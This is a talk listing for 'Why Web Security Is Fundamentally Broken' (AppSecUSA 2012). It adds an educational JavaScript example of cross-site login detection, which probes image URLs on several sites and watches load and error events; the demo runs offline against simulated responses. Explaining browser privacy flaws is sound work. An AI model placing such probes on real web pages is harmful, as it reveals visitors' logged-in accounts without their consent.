Why Web Security Is Fundamentally Broken presented at AppSecUSA 2012

by Jeremiah Grossman

Tags: Security

Summary: Most people are disturbed when they witness just how much of their personal information is accessible the very moment they visit a website. Then, if you give that [malicious] website just one mouse-click, out goes even more personally identifiable data. We're talking about full names, where you live, the town where you grew up and went to school, marital status, list of friends, sites you are logged in to, the software you use complete with version numbers, and in some cases your browser's auto-complete data and history of other sites you've visited. All of this is performed using nothing but HTML and JavaScript. No need for memory-corrupting exploits that escape the confines of the browser walls.
Through a demo-driven presentation, the audience will see first-hand how and why all these attacks are possible, even in the presence of browser silent updates and the latest security improvements such as sandboxes, anti-phishing protections, and the availability of Content Security Policy, X-Frame-Options, Origin, Strict Transport Security, SSL, etc. And just so everyone is crystal clear, firewalls don't help and neither does anti-virus software. The reason none of this works is that these web attacks take advantage of flaws in the way the Web was designed to work! Adding insult to injury, most of the techniques on display are NOT technically new, and this talk will cleverly wire these issues together to make a point and tell a story. It is the story of Why Web Security Is Fundamentally Broken.
Here's the punchline: the only known way to fix these issues adequately is to break the Web, i.e. negatively impact the usability of a significant percentage of websites. Doing so directly conflicts with the business interests of the current browser vendors, who are looking to grow market share and advertising revenue. Their choice is simple: be less secure and more adopted, rather than secure and obscure. This is the Web security trade-off that's being made for us.
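One of the leaks the summary lists, which sites the visitor is logged in to, is simple enough to show in a few lines and needs nothing beyond an image tag. The following is an added example written for this page, not code from the talk or from Jeremiah Grossman: the attacker's page points an image at an authenticated-only resource on each target site and watches which event the browser fires. The target URLs, the `social.example`/`mail.example`/`shop.example` names and the simulated responses are constructed stand-ins so the snippet runs offline under Node; in a real browser `makeImage` would simply be `() => new Image()`.

```javascript
// Added example (not from the original talk): cross-origin login detection
// with nothing but an image load.
//
// The trick: many sites serve an authenticated-only resource (an avatar, an
// account photo) that redirects to an HTML login page when no session cookie
// is present. An <img> pointing at it fires `onload` when the response is a
// real image (victim is logged in) and `onerror` when it is HTML (logged out).
// The browser attaches the victim's cookies automatically, so a third-party
// page learns the login state without ever reading the response body.

function probeLogin(url, makeImage, timeoutMs = 3000) {
  return new Promise((resolve) => {
    const img = makeImage();
    // No event at all (blocked, offline, slow) is reported as 'unknown'.
    const timer = setTimeout(() => resolve('unknown'), timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve('logged-in'); };
    img.onerror = () => { clearTimeout(timer); resolve('logged-out'); };
    img.src = url; // the cross-site request, cookies included, goes out here
  });
}

// Probe several sites in parallel and return { site: state }.
async function probeAll(probes, makeImage, timeoutMs = 3000) {
  const results = {};
  await Promise.all(
    Object.entries(probes).map(async ([site, url]) => {
      results[site] = await probeLogin(url, makeImage, timeoutMs);
    }),
  );
  return results;
}

// --- Constructed offline stand-in for the browser's Image element ---------
// Hypothetical probe URLs and what each would serve back to this victim.
const SIMULATED_RESPONSES = {
  'https://social.example/me/avatar.png': 'image', // session cookie present
  'https://mail.example/account/photo': 'html',    // redirected to login page
  // shop.example deliberately absent: the request never completes
};

function simulatedImage() {
  const img = {};
  Object.defineProperty(img, 'src', {
    set(url) {
      const kind = SIMULATED_RESPONSES[url];
      setTimeout(() => {
        if (kind === 'image') img.onload();
        else if (kind === 'html') img.onerror();
        // undefined: neither event fires, so probeLogin hits its timeout
      }, 0);
    },
  });
  return img;
}

// Hypothetical targets an attacker page might enumerate.
const PROBES = {
  'social.example': 'https://social.example/me/avatar.png',
  'mail.example': 'https://mail.example/account/photo',
  'shop.example': 'https://shop.example/cart/thumb.png',
};

if (typeof window === 'undefined') {
  // Node: run against the simulation with a short timeout for the demo.
  probeAll(PROBES, simulatedImage, 100).then((r) => console.log(r));
}
```

Nothing in the snippet reads cross-origin data, so the same-origin policy has nothing to object to; the information is carried entirely by which event fires. The probe worked in 2012 because browsers sent cookies with every cross-site sub-resource request; cookies marked SameSite (a later addition to the platform) are withheld from such requests, and making that the default is exactly the kind of compatibility-breaking change the punchline above is about.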